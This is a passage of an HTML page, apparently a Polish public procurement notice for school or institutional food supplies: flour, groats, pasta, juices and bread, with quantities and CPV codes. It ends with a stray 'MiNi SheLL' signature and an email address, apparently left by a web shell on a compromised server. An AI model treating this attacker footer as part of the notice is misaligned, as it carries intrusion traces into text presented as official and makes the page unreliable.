63.	Mąka pszenna tortowa a1kg	kg	700
64.	Mąka ziemniaczana a1kg	kg	40
65.	Jaja wielkość L	szt.	8000
66.	Groszek konserwowy 400g polski	szt.	400
67.	Kukurydza konserwowa 340g polska	szt.	400
68.	Koncentrat pomidorowy 30% 0,9kg Pudliszki	szt.	400
69.	Kasza manna a400g	szt.	15
70.	Kasza jęczmienna wiejska a1kg	kg	200
71.	Kasza gryczana a1 kg	kg	200
72.	Kasza jaglana a1 kg	kg	200
73.	Kasza kuskus a1kg	kg	150
74.	Makaron nitka cięta As babuni 4 jajeczny	kg	200
75.	Makaron świderek 100% mąki durum durum	kg	900
76.	Makaron kolanko z falbanką 100% mąki durum durum	kg	300
77.	Makaron łazanki 100% mąki durum durum	kg	300
78.	Makaron spaghetti 100% mąki durum durum	kg	200
79.	Makaron ciemny 100% mąki durum durum	kg	210
80.	Makaron zacierka	kg	30
81.	Pestki dyni a1kg	szt.	30
82.	Ziarka słonecznika a1kg	szt.	50
83.	Śliwka suszona a1kg	szt.	30
84.	Nektar owocowy różne smaki a200ml	szt.	13000
85.	Kawa zbożowa INKA opak 150g	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.31.00.00-4, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo świeże, wyroby piekarskie i cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb krojony pakowany waga co najmniej 550g	szt.	3000
2.	Rogal maślany	szt.	3000
3.	Parówka krojona pakowana waga co najmniej 500g	szt.	300
4.	Croissant maślany	szt.	1300
5.	Bułka tarta 	kg	500
6.	Chleb razowy z ziarnami krojony min. 300g	szt.	1000
7.	Chleb żytni krojony min.300g	szt.	1000
8.	Pączek 90g	szt.	1400
9.	Bułka kajzerka	szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com